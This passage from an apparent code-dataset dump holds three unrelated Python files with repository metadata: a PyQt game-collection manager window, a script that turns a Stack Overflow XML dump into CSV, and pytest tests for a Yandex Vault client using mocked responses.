self.fileMenu.addAction(self.buttonActions(\"exit\"))\n self.viewMenu = self.menuBar().addMenu(self.tr(\"&View\"))\n self.viewMenu.addAction(self.buttonActions(\"owned\"))\n self.viewMenu.addAction(self.buttonActions(\"delnotowned\"))\n self.viewMenu.addAction(self.buttonActions(\"value\"))\n self.helpMenu = self.menuBar().addMenu(self.tr(\"&Help\"))\n self.helpMenu.addAction(self.buttonActions(\"about\"))\n\n self.statusProgressBar = QProgressBar()\n self.statusProgressBar.setMaximumSize(100, 15)\n self.statusProgressBar.setRange(0, 0)\n self.statusProgressBar.setVisible(False)\n self.statusBar().addPermanentWidget(self.statusProgressBar)\n\n # Search stuff\n 
self.searchLabel = QLabel(\"Search\")\n self.searchLabel.setVisible(False)\n self.searchBox = QLineEdit()\n self.searchBox.setVisible(False)\n self.searchBox.setClearButtonEnabled(True)\n # self.searchBox.textChanged.connect(self.search)\n self.searchBox.returnPressed.connect(self.search)\n self.searchBtn = QPushButton(\"Search\")\n self.searchBtn.clicked.connect(self.search)\n self.searchBtn.setVisible(False)\n self.filterBtn = QPushButton(\"Filter\")\n self.filterBtn.clicked.connect(self.filterDock.toggleVisibility)\n self.filterBtn.setVisible(False)\n\n # Tab layout.\n self.tab.addTab(self.overview.widget, \"Overview\")\n self.tab.addTab(self.gamesTableView, \"Games\")\n self.tab.addTab(self.consolesTableView, \"Consoles\")\n self.tab.addTab(self.accessoriesTableView, \"Accessories\")\n self.tab.addTab(self.randomizer.widget, \"Randomizer\")\n self.tab.currentChanged.connect(self.search)\n self.tab.currentChanged.connect(self.sidePanel.hideDetails)\n # Connect sidePanel's saved signal to corresponding table's updateData()\n # TODO: Update the sets of platforms and genres properly\n self.sidePanel.saved.connect(self.tableViewList[self.tab.currentIndex()].updateData)\n self.sidePanel.saved.connect(lambda: self.randomizer.updateLists(self.gamesTableView.ownedItems(),\n sorted(self.allPlatforms, key=str.lower),\n sorted(self.allGenres, key=str.lower)))\n\n # Main layout\n self.tabHbox = QHBoxLayout()\n self.tabHbox.addWidget(self.tab, 1)\n self.tabHbox.addWidget(self.sidePanel, 1)\n self.advSearchHbox = QHBoxLayout()\n self.advSearchHbox.addWidget(self.filterDock, 0)\n self.searchHbox = QHBoxLayout()\n self.searchHbox.addWidget(self.searchLabel, 0)\n self.searchHbox.addWidget(self.searchBox, 1)\n self.searchHbox.addWidget(self.filterBtn, 0)\n self.searchHbox.addWidget(self.searchBtn, 0)\n self.mainLayout = QVBoxLayout()\n self.mainLayout.addLayout(self.tabHbox, 1)\n self.mainLayout.addLayout(self.advSearchHbox, 0)\n self.mainLayout.addLayout(self.searchHbox, 0)\n self.centralWidget.setLayout(self.mainLayout)\n\n # Make sure screen geometry is big enough. Otherwise set window to maximized.\n gSize = QApplication.desktop().availableGeometry()\n if gSize.width() <= 1280 or gSize.height() <= 768:\n logger.info(\"Screen geometry smaller than 1280x768. Setting window to maximized mode.\")\n self.showMaximized()\n else:\n self.resize(1280, 768)\n self.center()\n\n self.setWindowTitle(f\"Game Collection Manager v{_VERSION}\")\n self.statusBar().showMessage(\"\")\n\n def about(self):\n aboutMsg = QMessageBox()\n aboutMsg.setIcon(QMessageBox.Information)\n aboutMsg.setWindowTitle(\"About\")\n aboutMsg.setText(\"
Game Collection Manager
\")\n aboutMsg.setInformativeText(f\"Version {_VERSION}\\n\")\n aboutMsg.exec_()\n self.search()\n\n def addToCollection(self):\n \"\"\"\n Adds data to the collection using InputWindow\n \"\"\"\n\n # Loop until user enters valid data\n while True:\n self.addWindow = InputWindow(self.allPlatforms)\n if self.addWindow.exec_() == QDialog.Accepted:\n data = self.addWindow.returnData()\n\n if data['platform'].isspace() or data['name'] == \"\":\n msgBox = QMessageBox()\n msgBox.setIcon(QMessageBox.Information)\n msgBox.setWindowTitle(\"Invalid entry\")\n msgBox.setText(\"Platform and name cannot be empty\")\n msgBox.exec_()\n continue\n\n # Update Platform, Region, Genre, and Year in filter dock if necessary\n if data[\"platform\"] not in self.allPlatforms:\n self.allPlatforms.add(data[\"platform\"])\n self.filterDock.updatePlatforms(sorted(self.allPlatforms, key=str.lower))\n if data[\"region\"] not in self.allRegions:\n self.allRegions.add(data[\"region\"])\n self.filterDock.updateRegions(sorted(self.allRegions, key=str.lower))\n if data[\"genre\"] not in self.allGenres:\n self.allGenres.add(data[\"genre\"])\n self.filterDock.updateGenres(sorted(self.allGenres, key=str.lower))\n if data[\"year\"] not in self.allYears:\n self.allYears.add(data[\"year\"])\n self.filterDock.updateYears(sorted(self.allYears, key=str.lower))\n\n if \"game\" in data.keys():\n self.gamesTableView.addData(data)\n self.overview.updateData(self.gamesTableView)\n self.randomizer.updateLists(self.gamesTableView.ownedItems(),\n sorted(self.allPlatforms, key=str.lower),\n sorted(self.allGenres, key=str.lower))\n elif \"console\" in data.keys():\n self.consolesTableView.addData(data)\n self.overview.updateData(self.consolesTableView)\n elif \"accessory\" in data.keys():\n self.accessoriesTableView.addData(data)\n self.overview.updateData(self.accessoriesTableView)\n self.search()\n else:\n break\n\n def deleteFromCollection(self):\n currentTab = self.tab.currentIndex()\n\n if 0 < currentTab < 4:\n msgBox = QMessageBox()\n msgBox.setWindowTitle(\"Delete items\")\n msgBox.setText(\"Are you sure?\")\n msgBox.setIcon(QMessageBox.Warning)\n msgBox.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n msgBox.setDefaultButton(QMessageBox.Cancel)\n ok = msgBox.exec_()\n\n if ok == QMessageBox.Ok:\n rows = []\n indexes = self.tableViewList[currentTab-1].selectedIndexes()\n for index in indexes:\n rows.append(index.row())\n self.tableViewList[currentTab-1].deleteData(rows)\n self.overview.updateData(self.tableViewList[currentTab-1])\n if currentTab == 1:\n self.randomizer.updateLists(self.gamesTableView.ownedItems(),\n sorted(self.allPlatforms, key=str.lower),\n sorted(self.allGenres, key=str.lower))\n self.search()\n\n def deleteNotOwned(self):\n \"\"\"\n Deletes items in table that are not owned. Not owned items are items that\n don't have either the item itself, the box, or the manual.\n \"\"\"\n currentTab = self.tab.currentIndex()\n\n if 0 < currentTab < 4:\n msgBox = QMessageBox()\n msgBox.setWindowTitle(\"Remove not owned items\")\n msgBox.setText(\"Are you sure?\")\n msgBox.setIcon(QMessageBox.Warning)\n msgBox.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n msgBox.setDefaultButton(QMessageBox.Cancel)\n ok = msgBox.exec_()\n\n if ok == QMessageBox.Ok:\n self.tableViewList[currentTab-1].deleteNotOwned()\n self.search()\n\n def fetchInfo(self):\n \"\"\"\n Fetches info for all games from MobyGames. 
Sleeps for 5 seconds\n between game so we don't annoy their servers.\n :return:\n \"\"\"\n msgBox = QMessageBox()\n msgBox.setWindowTitle(\"Fetch info for all games\")\n msgBox.setText(\"This will take a long time. Are you sure?\")\n msgBox.setIcon(QMessageBox.Warning)\n msgBox.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n msgBox.setDefaultButton(QMessageBox.Cancel)\n ok = msgBox.exec_()\n\n if ok == QMessageBox.Ok:\n games = self.gamesTableView.ownedItems()\n for game in games:\n info = getMobyRelease(game[\"name\"], game[\"platform\"], game[\"region\"])\n price = getPriceData(game[\"name\"], game[\"platform\"], game[\"region\"])\n paidPrice = game[\"price\"].split(\",\")[0]\n info[\"price\"] = \",\".join((paidPrice, price[\"loose\"], price[\"cib\"], price[\"new\"]))\n info[\"id\"] = game[\"id\"]\n self.gamesTableView.updateData(info)\n\n if \"image\" in info.keys() and info[\"image\"] != \"\":\n coverDir = path.join(\"data\", \"images\", \"covers\")\n id = str(game[\"id\"]) + \".jpg\"\n imageData = requests.get(info[\"image\"]).content\n\n if not path.exists(path.join(coverDir, id)):\n with open(path.join(coverDir, id), \"wb\") as f:\n f.write(imageData)\n\n sleep(5) # Be nice\n\n def importToDatabase(self):\n \"\"\"\n Imports all games from selected platforms into database as not owned.\n This is to make it easier for the user to quickly go through the games\n in a platform and check which games they own.\n \"\"\"\n self.importWindow = ImportWindow()\n if self.importWindow.exec_() == QDialog.Accepted:\n data, platforms, regions = self.importWindow.returnData()\n self.statusProgressBar.setVisible(True)\n self.gamesTableView.addData(data)\n self.statusProgressBar.setVisible(False)\n\n for platform in platforms:\n if platform not in self.allPlatforms:\n self.allPlatforms.add(platform)\n self.filterDock.updatePlatforms(sorted(self.allPlatforms, key=str.lower))\n for region in regions:\n if region not in self.allRegions:\n self.allRegions.add(region)\n self.filterDock.updateRegions(sorted(self.allRegions, key=str.lower))\n self.search()\n\n def importSteamLibrary(self):\n apiKey, ok = QInputDialog.getText(self, \"Import Steam Library\", \"Enter Steam API Key:\")\n if ok and not (apiKey.isspace() or apiKey == \"\"):\n steamID, ok = QInputDialog.getText(self, \"Import Steam Library\", \"Enter Steam User ID:\")\n if ok and not (steamID.isspace() or steamID == \"\"):\n try:\n games = getSteamLibrary(apiKey, steamID)\n except (PermissionError, ValueError) as e:\n msgBox = QMessageBox(QMessageBox.Critical, \"Error\", \"An error occured.\")\n msgBox.setInformativeText(str(e))\n msgBox.exec_()\n else:\n if \"Steam\" not in self.allPlatforms:\n self.allPlatforms.add(\"Steam\")\n self.allRegions.add(\"Steam\")\n self.filterDock.updatePlatforms(sorted(self.allPlatforms, key=str.lower))\n self.filterDock.updateRegions(sorted(self.allRegions, key=str.lower))\n self.gamesTableView.addData(games)\n else: # Only add games not already in collection\n existingGames = []\n query = QSqlQuery()\n query.exec_(\"SELECT Name from games WHERE Region='Steam'\")\n while query.next():\n existingGames.append(query.value(0))\n\n for game in games:\n if game[\"name\"] not in existingGames:\n self.gamesTableView.addData(game)\n self.overview.updateData(self.gamesTableView)\n self.randomizer.updateLists(self.gamesTableView.ownedItems(),\n sorted(self.allPlatforms, key=str.lower),\n sorted(self.allGenres, key=str.lower))\n self.search()\n\n def exportToCSV(self):\n def doexport():\n filetype = 
filetypes.currentText()\n exportTables = []\n db = self.consolesTableView.model.database()\n if tablesBox.currentIndex() == 0:\n for table in tables[1:]:\n exportTables.append(table.lower())\n elif tablesBox.currentIndex() == 1:\n exportTables.append(\"games\")\n elif tablesBox.currentIndex() == 2:\n exportTables.append(\"consoles\")\n elif tablesBox.currentIndex() == 3:\n exportTables.append(\"accessories\")\n\n sql2csv(db, exportTables, filetype)\n exportWindow.close()\n\n exportWindow = QDialog()\n\n tables = [\"All\", \"Games\", \"Consoles\", \"Accessories\"]\n tablesLabel = QLabel(\"Tables to export\")\n tablesBox = QComboBox()\n # tablesBox.addItem(None, text=\"All\")\n tablesBox.addItems(tables)\n tablesLayout = QHBoxLayout()\n tablesLayout.addWidget(tablesLabel)\n tablesLayout.addWidget(tablesBox)\n\n filetypesLabel = QLabel(\"Filetype\")\n filetypes = QComboBox()\n filetypes.addItems([\"csv\", \"tsv\"])\n filetypesLayout = QHBoxLayout()\n filetypesLayout.addWidget(filetypesLabel)\n filetypesLayout.addWidget(filetypes)\n\n # filenameLabel = QLabel(\"Filename\")\n # filename = QLineEdit()\n # filesLayout = QHBoxLayout()\n # filesLayout.addWidget(filenameLabel)\n # filesLayout.addWidget(filename)\n\n ok = QPushButton(\"Ok\")\n ok.clicked.connect(doexport)\n cancel = QPushButton(\"Cancel\")\n cancel.clicked.connect(exportWindow.close)\n buttonLayout = QHBoxLayout()\n buttonLayout.addWidget(ok)\n buttonLayout.addWidget(cancel)\n\n layout = QVBoxLayout()\n layout.addLayout(tablesLayout)\n # layout.addLayout(filesLayout)\n layout.addLayout(filetypesLayout)\n layout.addLayout(buttonLayout)\n\n exportWindow.setLayout(layout)\n exportWindow.exec_()\n\n # noinspection PyCallByClass,PyTypeChecker\n def buttonActions(self, action: str) -> QAction:\n addAct = QAction(QIcon().fromTheme(\"list-add\"), \"&Add to collection...\", self)\n addAct.setShortcut(\"Ctrl+A\")\n addAct.setToolTip(\"Add to collection\")\n addAct.triggered.connect(self.addToCollection)\n\n delText = \"&Delete row\"\n currentTab = self.tab.currentIndex()\n if 0 < currentTab < 4:\n if len(self.tableViewList[currentTab-1].selectedIndexes()) > 1:\n delText += \"s\"\n delAct = QAction(QIcon().fromTheme(\"edit-delete\"), delText, self)\n delAct.setToolTip(\"Delete from collection\")\n delAct.triggered.connect(self.deleteFromCollection)\n\n detAct = QAction(QIcon.fromTheme(\"text-x-generic-template\"), \"Details...\", self)\n detAct.setToolTip(\"Open details side-panel\")\n detAct.triggered.connect(self.tableViewList[currentTab-1].rowData)\n\n expAct = QAction(QIcon.fromTheme(\"text-x-generic-template\"), \"&Export as csv...\", self)\n expAct.setShortcut(\"Ctrl+E\")\n expAct.setToolTip(\"Export table as CSV file\")\n expAct.triggered.connect(self.exportToCSV)\n\n impAct = QAction(QIcon.fromTheme(\"insert-object\"), \"&Import platform template...\", self)\n impAct.setShortcut(\"Ctrl+I\")\n impAct.setToolTip(\"Import games to database\")\n impAct.triggered.connect(self.importToDatabase)\n\n stmAct = QAction(QIcon.fromTheme(\"insert-object\"), \"Import Steam Library...\", self)\n stmAct.triggered.connect(self.importSteamLibrary)\n\n ownAct = QAction(\"Hide games not in collection\", self)\n ownAct.setCheckable(True)\n ownAct.setChecked(True)\n ownAct.triggered.connect(self.toggleOwnedFilter)\n\n delNotOwned = QAction(QIcon().fromTheme(\"edit-delete\"), \"Remove items not in collection\", self)\n delNotOwned.setToolTip(\"Remove items that are not owned from database\")\n delNotOwned.triggered.connect(self.deleteNotOwned)\n\n aboutAct = 
QAction(QIcon.fromTheme(\"help-about\"), \"Abou&t\", self)\n aboutAct.setToolTip(\"About Game Collection Manager\")\n aboutAct.triggered.connect(self.about)\n\n exitAct = QAction(QIcon.fromTheme(\"application-exit\"), \"&Exit\", self)\n exitAct.setShortcut(\"Ctrl+Q\")\n exitAct.setToolTip(\"Exit application\")\n exitAct.triggered.connect(self.close)\n\n infoAct = QAction(\"Debug: Print row info\", self)\n infoAct.triggered.connect(self.info)\n\n fetchAct = QAction(\"Fetch info for all games...\", self)\n fetchAct.setToolTip(\"Tries to fetch info for all games from MobyGames\")\n fetchAct.triggered.connect(self.fetchInfo)\n\n valAct = QAction(\"Total value of collection\", self)\n valAct.setToolTip(\"Rough estimate of the total value of collection\")\n valAct.triggered.connect(self.totalValue)\n\n act = {\"add\": addAct, \"del\": delAct, \"det\": detAct, \"export\": expAct,\n \"import\": impAct, \"steam\": stmAct, \"owned\": ownAct,\n \"delnotowned\": delNotOwned, \"about\": aboutAct, \"exit\": exitAct,\n \"info\": infoAct, \"fetch\": fetchAct, \"value\": valAct}\n\n return act.get(action)\n\n def center(self):\n \"\"\"Centers window on screen\"\"\"\n\n qr = self.frameGeometry()\n cp = QDesktopWidget().availableGeometry().center()\n qr.moveCenter(cp)\n self.move(qr.topLeft())\n\n def contextMenuEvent(self, event):\n \"\"\"Re-implements context menu functionality for our needs.\"\"\"\n cmenu = QMenu(self)\n\n currentTab = self.tab.currentIndex()\n\n if 0 < currentTab < 4:\n cmenu.addAction(self.buttonActions(\"det\"))\n cmenu.addAction(self.buttonActions(\"del\"))\n cmenu.addAction(self.buttonActions(\"info\"))\n cmenu.exec_(self.mapToGlobal(event.pos()))\n\n self.search()\n\n def info(self):\n currentTab = self.tab.currentIndex()\n indexes = self.tableViewList[currentTab-1].selectedIndexes()\n rows = [index.row() for index in indexes]\n for _ in rows:\n self.tableViewList[currentTab-1].rowInfo()\n\n def search(self):\n \"\"\"Filters table contents based on user input\"\"\"\n\n currentTab = self.tab.currentIndex()\n\n if 0 < currentTab < 4:\n searchText = self.searchBox.text()\n self.searchLabel.setVisible(True)\n self.searchBox.setVisible(True)\n self.filterBtn.setVisible(True)\n self.searchBtn.setVisible(True)\n self.filterDock.setItemType(currentTab)\n itemCount = self.tableViewList[currentTab - 1].filterTable(searchText, self.filterDock.getSelections())\n\n if searchText != \"\" or len(self.filterDock.getSelections()) > 0:\n self.statusBar().showMessage(\"Found {} {}.\".format(itemCount,\n self.tableViewList[currentTab-1].model.tableName()))\n else:\n self.updateStatusbar()\n else:\n self.searchLabel.setVisible(False)\n self.searchBox.setVisible(False)\n self.filterBtn.setVisible(False)\n self.searchBtn.setVisible(False)\n if self.filterDock.isVisible():\n self.filterDock.toggleVisibility()\n\n def toggleOwnedFilter(self):\n for table in self.tableViewList:\n table.setHideNotOwned(False) if table.hideNotOwned\\\n else table.setHideNotOwned(True)\n currentTab = self.tab.currentIndex()\n if 0 < currentTab < 4:\n self.tableViewList[currentTab-1].filterTable(self.searchBox.text(), self.filterDock.getSelections())\n self.search()\n\n def totalValue(self):\n value = 0.0\n items = []\n for table in self.tableViewList:\n items.extend(table.ownedItems())\n\n for item in items:\n if item[\"item\"] == \"Yes\" and item[\"box\"] == \"Yes\" and item[\"manual\"] == \"Yes\":\n price = item[\"price\"].split(\",\")[2]\n else:\n price = item[\"price\"].split(\",\")[1]\n\n if price == \"N/A\":\n value += 
0\n                continue\n            value += float(price.lstrip(\"$\"))\n\n        displayMsgBox(\"Collection value\", \"Rough estimate of collection's value.\",\n                      f\"\\n\\n${str(value)}\\n\\n
\", \"information\")\n\n def updateStatusbar(self):\n currentTab = self.tab.currentIndex()\n itemType = [\"games\", \"consoles\", \"accessories\"]\n\n if currentTab == 0:\n self.statusBar().showMessage(\"\")\n elif 0 < currentTab < 4:\n numItems = self.tableViewList[currentTab-1].ownedCount\n if self.tableViewList[currentTab-1].hideNotOwned:\n self.statusBar().showMessage(f\"{numItems} {itemType[currentTab-1]} in collection.\")\n else:\n self.statusBar().showMessage(\"Showing {} {} ({} {} in collection).\".format(\n self.tableViewList[currentTab-1].allCount,\n itemType[currentTab-1],\n numItems,\n itemType[currentTab-1]))\n elif currentTab == 4:\n platforms = self.randomizer.consoleList.selectedItems()\n genres = self.randomizer.genreList.selectedItems()\n self.statusBar().showMessage(\"Select platforms or genre to randomize from.\")\n if len(platforms) > 0 or len(genres) > 0:\n self.statusBar().showMessage(f\"Selecting from {self.randomizer.gameCount()} games.\")\n return\n\n\ndef displayMsgBox(title: str, message: str, info: str, messageType: str):\n icons = {\"warning\": QMessageBox.Warning,\n \"critical\": QMessageBox.Critical,\n \"question\": QMessageBox.Question,\n \"information\": QMessageBox.Information}\n\n msgBox = QMessageBox()\n msgBox.setWindowTitle(title)\n msgBox.setText(message)\n msgBox.setInformativeText(info)\n msgBox.setIcon(icons[messageType])\n if messageType == \"question\":\n msgBox.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n msgBox.setDefaultButton(QMessageBox.Cancel)\n\n return msgBox.exec_()\n","repo_name":"rsvensson/GameCollectionManager","sub_path":"GameCollectionManager/widgets/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":27760,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"5977707811","text":"from lxml import etree\nfrom datetime import datetime\nimport csv\nimport logging\nimport argparse\nfrom util import tags_huge, keyword_list, cols_base, wrap_tags\nfrom pathlib import Path\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-p\", \"--progressindicatorvalue\",\n help=\"Shows nr of rows imported for larger files\", type=int, default=10000000)\nargs = parser.parse_args()\n\n\ninputdir = \"/home/amirrezaesmaeili/Downloads/Persepolis/Compressed/data/Stackoverflow.com-Posts/Posts.xml\"\noutputdir = \"./data/intermediary/\" + \\\n datetime.now().strftime(\"%Y-%m-%d_%H:%M:%S\")\nPath(outputdir).mkdir(parents=True, exist_ok=True)\n\ncols = cols_base\n\ndeprecate_keywords = keyword_list\n\ntarget_tags = wrap_tags(tags_huge)\n\ntotal_rows = 57721548\nprocess_row_limit = 5000000000000\ncreate_row_limit = 5000000000000\n# process_row_limit = 50000\n# create_row_limit = 500\nskip_title_body_check = False\n\n\ndef clean_data(column, type):\n _column = column\n if str(column) == \"False\":\n _column = 0\n elif str(column) == \"True\":\n _column = 1\n\n if type == \"CreationDate\" or type == \"LastActivityDate\" or type == \"LastEditDate\" or type == \"LastAccessDate\":\n _column = datetime.strptime(\n _column, \"%Y-%m-%dT%H:%M:%S.%f\").strftime(\"%Y-%m-%d %H:%M:%S\")\n return _column\n\n\nquestion_cache = {}\n\n\ndef process_row(mode, id, parent_id, post_type_id, tags, body, title):\n if post_type_id == '1':\n postType = 'Q'\n elif post_type_id == '2':\n postType = 'A'\n else:\n postType = 'U'\n\n if postType == 'U':\n return False\n if mode == 'scan' and postType == 'A':\n return False\n\n if postType == 'Q':\n tagsOk = False\n for tag in 
target_tags:\n if tag in tags:\n tagsOk = True\n break\n if not tagsOk:\n return False\n\n if mode == 'scan':\n question_cache[id] = []\n\n if postType == 'A':\n bodyOk = skip_title_body_check or False\n if not skip_title_body_check:\n for keyword in deprecate_keywords:\n if keyword in body:\n bodyOk = True\n break\n if not bodyOk:\n return False\n\n if parent_id in question_cache:\n question_cache[parent_id].append(id)\n else:\n return False\n\n return True\n\n\ndef parse_xml(sourcefilename, destinationfilename, columns, mode):\n context = etree.iterparse(sourcefilename, events=('end',), tag='row')\n if mode == 'write':\n f = open(destinationfilename, 'w', newline='', encoding=\"utf-8\")\n w = csv.writer(f, quoting=csv.QUOTE_ALL)\n processed_rows = 0\n created_rows = 0\n q_created_rows = 0\n a_created_rows = 0\n u_created_rows = 0\n if mode == 'write':\n w.writerow(columns)\n last_iter_time = datetime.now()\n for event, element in context:\n if (processed_rows % args.progressindicatorvalue == 0):\n elapsed_time = datetime.now() - last_iter_time\n last_iter_time = datetime.now()\n estimated_time = elapsed_time * \\\n ((total_rows - processed_rows) / args.progressindicatorvalue)\n logging.info(\" MODE: %s,Processed %s rows, created %s rows. elapsed: %s ETA: %s, done: %s%%\",\n mode, processed_rows, created_rows, elapsed_time, estimated_time, (processed_rows / total_rows) * 100)\n if processed_rows > process_row_limit or created_rows > create_row_limit:\n break\n\n processed_rows += 1\n post_type_id = element.attrib[\"PostTypeId\"]\n title = (element.attrib[\"Title\"]\n if \"Title\" in element.attrib else '').strip().lower()\n body = (element.attrib[\"Body\"]\n if \"Body\" in element.attrib else '').strip().lower()\n tags = (element.attrib[\"Tags\"]\n if \"Tags\" in element.attrib else '').strip().lower()\n id = (element.attrib[\"Id\"]\n if \"Id\" in element.attrib else '').strip().lower()\n parent_id = (element.attrib[\"ParentId\"]\n if \"ParentId\" in element.attrib else '').strip().lower()\n if process_row(mode, id, parent_id, post_type_id, tags, body, title):\n if mode == 'write':\n row = [clean_data(\n element.attrib[column], column) if column in element.attrib else '' for column in columns]\n w.writerow(row)\n created_rows += 1\n if post_type_id == '1':\n q_created_rows += 1\n elif post_type_id == '2':\n a_created_rows += 1\n else:\n u_created_rows += 1\n\n while element.getprevious() is not None:\n del element.getparent()[0]\n else:\n while element.getprevious() is not None:\n del element.getparent()[0]\n\n if mode == 'write':\n f.close()\n return processed_rows, created_rows, q_created_rows, a_created_rows, u_created_rows\n\n\nformat = \"%(asctime)s: %(message)s\"\nlogging.basicConfig(format=format, level=logging.INFO,\n datefmt=\"%H:%M:%S\")\n\nlogging.info(\"Starting processing\")\n\nstart_time = datetime.now()\nprocessed_rows, created_rows, q, a, u = parse_xml(\n inputdir, outputdir + \"/posts.csv\", cols, 'scan')\nelapsed_time = datetime.now() - start_time\n\nlogging.info(\"SCAN: Finished processing, processed %s rows, created %s rows in %s\",\n processed_rows, created_rows, elapsed_time)\n\nstart_time = datetime.now()\nprocessed_rows, created_rows, q_created_rows, a_created_rows, u_created_rows = parse_xml(\n inputdir, outputdir + \"/posts.csv\", cols, 'write')\nelapsed_time = datetime.now() - start_time\n\nlogging.info(\"WRITE: Finished processing, processed %s rows, created %s Q rows and %s A rows, Total: %s, in %s\",\n processed_rows, q_created_rows, a_created_rows, 
created_rows, elapsed_time)\n\nf = open(outputdir + \"/relations.csv\", 'w', newline='', encoding=\"utf-8\")\nw = csv.writer(f, quoting=csv.QUOTE_ALL)\nw.writerow(['QuestionId', 'AnswerId'])\nprocessed_rels = 0\ncreated_rels = 0\ncreated_rels_a = 0\nfor key, value in question_cache.items():\n processed_rels += 1\n if len(value) > 0:\n created_rels += 1\n ids = []\n for v in value:\n created_rels_a += 1\n ids.append(v)\n w.writerow([key, '-'.join(ids)])\n\n\nlogging.info(\"RELATIONS: Finished processing, processed %s rows, created %s, containing %s answers\",\n processed_rels, created_rels, created_rels_a)\n\nprint(sum([len(x) for x in question_cache.values()]))\n","repo_name":"Amirresm/SO-obso-data-collection","sub_path":"process_data_dump.py","file_name":"process_data_dump.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29256021007","text":"from datetime import datetime, timezone\n\nimport pytest\nfrom aiohttp.web import json_response\n\nfrom maps_adv.common.aioyav import AccessError, InvalidOAuthToken, InvalidUUID\n\npytestmark = [pytest.mark.asyncio]\n\n\n@pytest.fixture\ndef mock_versions(rmock):\n return lambda secret_uuid, *a: rmock(f\"/1/versions/{secret_uuid}/\", \"GET\", *a)\n\n\nasync def test_sends_correct_request(mock_versions, yav):\n request_path = None\n request_headers = None\n\n async def _handler(request):\n nonlocal request_path, request_headers\n request_path = request.path\n request_headers = request.headers\n return json_response(data=success_response, status=200)\n\n mock_versions(\"sec-01e6zwtfg5g4b727yq4w3qvnz3\", _handler)\n\n await yav.retrieve_secret_head(\"sec-01e6zwtfg5g4b727yq4w3qvnz3\")\n\n assert request_path == \"/1/versions/sec-01e6zwtfg5g4b727yq4w3qvnz3/\"\n assert request_headers.get(\"Authorization\") == \"OAuth oauth_token\"\n\n\nasync def test_returns_secret_details(mock_versions, yav):\n mock_versions(\n \"sec-01e6zwtfg5g4b727yq4w3qvnz3\",\n json_response(data=success_response, status=200),\n )\n\n got = await yav.retrieve_secret_head(\"sec-01e6zwtfg5g4b727yq4w3qvnz3\")\n\n assert got == {\n \"comment\": \"\",\n \"created_at\": datetime(2020, 4, 28, 8, 0, 31, 246000, tzinfo=timezone.utc),\n \"created_by\": 1120000000098712,\n \"creator_login\": \"sivakov512\",\n \"secret_name\": \"aioyav-example\",\n \"secret_uuid\": \"sec-01e6zwtfg5g4b727yq4w3qvnz3\",\n \"value\": {\"key_one\": \"some value\", \"100\": \"500\", \"key-two\": \"another\\nvalue\"},\n \"version\": \"ver-01e6zwtfgen5w925z9qztr9hcv\",\n }\n\n\nasync def test_raises_for_access_error(mock_versions, yav):\n mock_versions(\n \"sec-01e6zwtfg5g4b727yq4w3qvnz4\",\n json_response(\n data={\n \"api_request_id\": \"1f5f212bd9603059226f0dfeb72407e9\",\n \"code\": \"access_error\",\n \"environment\": \"production\",\n \"hostname\": \"vault-v4.passport.yandex.net\",\n \"message\": \"Access denied\",\n \"status\": \"error\",\n },\n status=401,\n ),\n )\n\n with pytest.raises(AccessError) as exc_info:\n await yav.retrieve_secret_head(\"sec-01e6zwtfg5g4b727yq4w3qvnz4\")\n\n assert exc_info.value.args[0] == {\n \"api_request_id\": \"1f5f212bd9603059226f0dfeb72407e9\",\n \"code\": \"access_error\",\n \"environment\": \"production\",\n \"hostname\": \"vault-v4.passport.yandex.net\",\n \"message\": \"Access denied\",\n \"status\": \"error\",\n }\n\n\nasync def test_raises_for_invalid_uuid(mock_versions, yav):\n mock_versions(\n \"sec-01e6zwtfg5g4b727yq4w3qvnz\",\n json_response(\n data={\n 
\"api_request_id\": \"f77daa307409ea959de04a9b3ef806e3\",\n \"code\": \"invalid_uuid_value\",\n \"environment\": \"production\",\n \"hostname\": \"vault-v2.passport.yandex.net\",\n \"message\": \"u'01e6zwtfg5g4b727yq4w3qvnz' is an invalid UUID value\",\n \"status\": \"error\",\n },\n status=400,\n ),\n )\n\n with pytest.raises(InvalidUUID) as exc_info:\n await yav.retrieve_secret_head(\"sec-01e6zwtfg5g4b727yq4w3qvnz\")\n\n assert exc_info.value.args[0] == {\n \"api_request_id\": \"f77daa307409ea959de04a9b3ef806e3\",\n \"code\": \"invalid_uuid_value\",\n \"environment\": \"production\",\n \"hostname\": \"vault-v2.passport.yandex.net\",\n \"message\": \"u'01e6zwtfg5g4b727yq4w3qvnz' is an invalid UUID value\",\n \"status\": \"error\",\n }\n\n\nasync def test_raises_for_invalid_oauth_token(mock_versions, make_yav):\n yav = await make_yav(\"wrong_token\")\n mock_versions(\n \"sec-01e6zwtfg5g4b727yq4w3qvnz3\",\n json_response(\n data={\n \"api_request_id\": \"5207955f647d8beaf63ee3180b9fdee8\",\n \"blackbox_error\": \"expired_token\",\n \"code\": \"invalid_oauth_token_error\",\n \"environment\": \"production\",\n \"hostname\": \"vault-s5.passport.yandex.net\",\n \"message\": \"Invalid oauth token\",\n \"status\": \"error\",\n },\n status=401,\n ),\n )\n\n with pytest.raises(InvalidOAuthToken) as exc_info:\n await yav.retrieve_secret_head(\"sec-01e6zwtfg5g4b727yq4w3qvnz3\")\n\n assert exc_info.value.args[0] == {\n \"api_request_id\": \"5207955f647d8beaf63ee3180b9fdee8\",\n \"blackbox_error\": \"expired_token\",\n \"code\": \"invalid_oauth_token_error\",\n \"environment\": \"production\",\n \"hostname\": \"vault-s5.passport.yandex.net\",\n \"message\": \"Invalid oauth token\",\n \"status\": \"error\",\n }\n\n\nsuccess_response = {\n \"status\": \"ok\",\n \"version\": {\n \"comment\": \"\",\n \"created_at\": 1588060831.246,\n \"created_by\": 1120000000098712,\n \"creator_login\": \"sivakov512\",\n \"secret_name\": \"aioyav-example\",\n \"secret_uuid\": \"sec-01e6zwtfg5g4b727yq4w3qvnz3\",\n \"value\": [\n {\"key\": \"key_one\", \"value\": \"some value\"},\n {\"key\": \"100\", \"value\": \"500\"},\n {\"key\": \"key-two\", \"value\": \"another\\nvalue\"},\n ],\n \"version\": \"ver-01e6zwtfgen5w925z9qztr9hcv\",\n 